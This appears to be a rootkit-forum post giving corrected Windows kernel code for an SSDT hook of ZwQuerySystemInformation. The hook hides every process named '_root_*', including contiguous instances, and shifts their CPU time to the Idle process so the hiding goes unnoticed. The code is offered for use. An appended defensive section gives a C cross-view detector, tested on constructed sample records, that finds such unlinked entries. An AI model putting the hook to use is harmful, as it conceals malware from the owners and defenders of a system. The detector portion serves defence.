SSDT hook example (hiding processes) correction

By: Orkblutt

 

Hi all,

Just a little correction to that example ( http://www.rootkit.com/vault/fuzen_op/HideProcessesHookMDL.zip ).

I've noticed that when several instances of the process we want to hide are running contiguously in the list, that example code is missing something and does not hide all of the instances.

Here's a way to do the job correctly:


///
// NewZwQuerySystemInformation function
//
// ZwQuerySystemInformation() returns a linked list of processes.
// The function below imitates it, except it removes from the list any
// process whose name begins with "_root_".

NTSTATUS NewZwQuerySystemInformation(
            IN ULONG SystemInformationClass,
            IN PVOID SystemInformation,
            IN ULONG SystemInformationLength,
            OUT PULONG ReturnLength)
{
    NTSTATUS ntStatus;

    ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
                    SystemInformationClass,
                    SystemInformation,
                    SystemInformationLength,
                    ReturnLength );

    if( NT_SUCCESS(ntStatus))
    {
        // SystemInformationClass 5 (SystemProcessInformation):
        // this is a query for the process list.
        if(SystemInformationClass == 5)
        {
            // Look for process names that start with
            // '_root_' and filter them out.
            struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
            struct _SYSTEM_PROCESSES *prev = NULL;

            while(curr)
            {
                int bContigousInstance = 0;
                //DbgPrint("Current item is %x\n", curr);
                if (curr->ProcessName.Buffer != NULL)
                {
                    if(0 == memcmp(curr->ProcessName.Buffer, L"_root_", 12))
                    {
                        m_UserTime.QuadPart += curr->UserTime.QuadPart;
                        m_KernelTime.QuadPart += curr->KernelTime.QuadPart;

                        if(prev) // Middle or last entry
                        {
                            if(curr->NextEntryDelta)
                            {
                                // Check whether the next process also needs to be hidden
                                if(((struct _SYSTEM_PROCESSES *)((char *)curr + curr->NextEntryDelta))->ProcessName.Buffer != NULL)
                                    if(0 == memcmp(((struct _SYSTEM_PROCESSES *)((char *)curr + curr->NextEntryDelta))->ProcessName.Buffer, L"_root_", 12))
                                        bContigousInstance = 1;
                                prev->NextEntryDelta += curr->NextEntryDelta;
                            }
                            else // We are last, so make prev the end
                                prev->NextEntryDelta = 0;
                        }
                        else
                        {
                            if(curr->NextEntryDelta)
                            {
                                // Check whether the next process also needs to be hidden
                                if(((struct _SYSTEM_PROCESSES *)((char *)curr + curr->NextEntryDelta))->ProcessName.Buffer != NULL)
                                    if(0 == memcmp(((struct _SYSTEM_PROCESSES *)((char *)curr + curr->NextEntryDelta))->ProcessName.Buffer, L"_root_", 12))
                                        bContigousInstance = 1;
                                // We are first in the list, so move it forward
                                (char *)SystemInformation += curr->NextEntryDelta;
                            }
                            else // We are the only process!
                                SystemInformation = NULL;
                        }
                    }
                }
                else // This is the entry for the Idle process
                {
                    // Add the kernel and user times of _root_*
                    // processes to the Idle process.
                    curr->UserTime.QuadPart += m_UserTime.QuadPart;
                    curr->KernelTime.QuadPart += m_KernelTime.QuadPart;

                    // Reset the timers for the next time we filter
                    m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
                }

                // When the next entry is also hidden, keep prev where it is so
                // its delta can be widened again on the next iteration.
                if(!bContigousInstance)
                    prev = curr;

                if(curr->NextEntryDelta)
                    ((char *)curr += curr->NextEntryDelta);
                else
                    curr = NULL;
            }
        }
        else if (SystemInformationClass == 8) // Query for SystemProcessorTimes
        {
            struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
            times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
        }
    }
    return ntStatus;
}



enjoy...
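From the defender's side, the detail worth noticing in the post above is that the hook never removes the hidden records from the buffer: it only widens the previous record's NextEntryDelta so the consumer's walk jumps over them. The records are still physically present, so a process that walks the buffer record by record instead of following the links sees them. The C program below is an added, user-mode illustration of that cross-view check; it is not code from the post or from the HideProcessesHookMDL example. Its ProcEntry structure is a constructed, fixed-size stand-in for the real variable-length _SYSTEM_PROCESSES records, and the five-process list it builds (PIDs, names, the widened delta) is constructed sample data.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>

/* Constructed stand-in for the _SYSTEM_PROCESSES records returned by
 * ZwQuerySystemInformation(SystemInformationClass 5). The real records are
 * variable length (UNICODE_STRING name, trailing thread array); a fixed-size
 * record is used here so the example builds and runs offline anywhere. The
 * field the hook rewrites, NextEntryDelta, keeps its real meaning: byte
 * offset from this record to the next one, 0 for the last record. */
typedef struct {
    uint32_t NextEntryDelta;
    uint32_t ProcessId;
    wchar_t  ProcessName[16];
} ProcEntry;

#define MAX_PROCS 64

/* Consumer view: follow NextEntryDelta the way tasklist or Task Manager would.
 * Bounds-checked so a malformed delta cannot walk off the end of the buffer. */
static size_t linked_walk(const unsigned char *buf, size_t len, uint32_t *pids, size_t max) {
    size_t off = 0, n = 0;
    while (n < max && off + sizeof(ProcEntry) <= len) {
        ProcEntry e;
        memcpy(&e, buf + off, sizeof e);      /* memcpy: no alignment assumptions */
        pids[n++] = e.ProcessId;
        if (e.NextEntryDelta == 0) break;      /* last record */
        off += e.NextEntryDelta;               /* unsigned delta: always moves forward */
    }
    return n;
}

/* Physical view: the hook only rewrites deltas, so unlinked records are still
 * in the buffer. Step by record size and ignore the links entirely. */
static size_t linear_walk(const unsigned char *buf, size_t len, uint32_t *pids, size_t max) {
    size_t n = 0;
    for (size_t off = 0; n < max && off + sizeof(ProcEntry) <= len; off += sizeof(ProcEntry)) {
        ProcEntry e;
        memcpy(&e, buf + off, sizeof e);
        pids[n++] = e.ProcessId;
    }
    return n;
}

static int contains(const uint32_t *pids, size_t n, uint32_t pid) {
    for (size_t i = 0; i < n; i++)
        if (pids[i] == pid) return 1;
    return 0;
}

/* Report every PID that is physically present but unreachable through the
 * link chain. Returns the number of such records written to 'hidden'. */
size_t find_unlinked(const unsigned char *buf, size_t len, uint32_t *hidden, size_t max) {
    uint32_t linked[MAX_PROCS], all[MAX_PROCS];
    size_t nl = linked_walk(buf, len, linked, MAX_PROCS);
    size_t na = linear_walk(buf, len, all, MAX_PROCS);
    size_t nh = 0;
    for (size_t i = 0; i < na && nh < max; i++)
        if (!contains(linked, nl, all[i])) hidden[nh++] = all[i];
    return nh;
}

/* Constructed sample: five records. With 'tamper' set, record 1's delta is
 * widened to jump over records 2 and 3, which is the footprint the hook above
 * leaves when two contiguous "_root_" instances are unlinked
 * (prev->NextEntryDelta += curr->NextEntryDelta, applied twice). */
static size_t build_sample(ProcEntry *list, int tamper) {
    const uint32_t pids[5] = { 4, 612, 1300, 1304, 2048 };
    const wchar_t *names[5] = { L"System", L"explorer.exe", L"_root_a.exe",
                                L"_root_b.exe", L"notepad.exe" };
    for (size_t i = 0; i < 5; i++) {
        list[i].NextEntryDelta = (i + 1 < 5) ? (uint32_t)sizeof(ProcEntry) : 0;
        list[i].ProcessId = pids[i];
        wcsncpy(list[i].ProcessName, names[i], 15);
        list[i].ProcessName[15] = L'\0';
    }
    if (tamper)
        list[1].NextEntryDelta = 3 * (uint32_t)sizeof(ProcEntry);
    return 5 * sizeof(ProcEntry);
}

/* Number of unlinked records the detector finds in the constructed sample. */
size_t sample_hidden_count(int tamper) {
    ProcEntry list[5];
    uint32_t hidden[MAX_PROCS];
    size_t len = build_sample(list, tamper);
    return find_unlinked((const unsigned char *)list, len, hidden, MAX_PROCS);
}

int main(void) {
    ProcEntry list[5];
    uint32_t hidden[MAX_PROCS];
    size_t len = build_sample(list, 1);
    size_t nh = find_unlinked((const unsigned char *)list, len, hidden, MAX_PROCS);
    printf("%zu record(s) present in the buffer but skipped by the link chain:\n", nh);
    for (size_t i = 0; i < nh; i++)
        printf("  PID %u\n", (unsigned)hidden[i]);
    return 0;
}
```

Against real NtQuerySystemInformation output the linear walk cannot step by a fixed size: each record's true length has to be derived from its own fields (the fixed header, the thread array sized by the thread count, and the name bytes that follow), and a delta larger than that computed length is the signal. The check is also only as strong as the assumption that the hook leaves the records in place; a hook that compacts the buffer defeats it, which is why this heuristic is normally one of several cross-view comparisons (for example against other enumeration sources) rather than a verdict on its own.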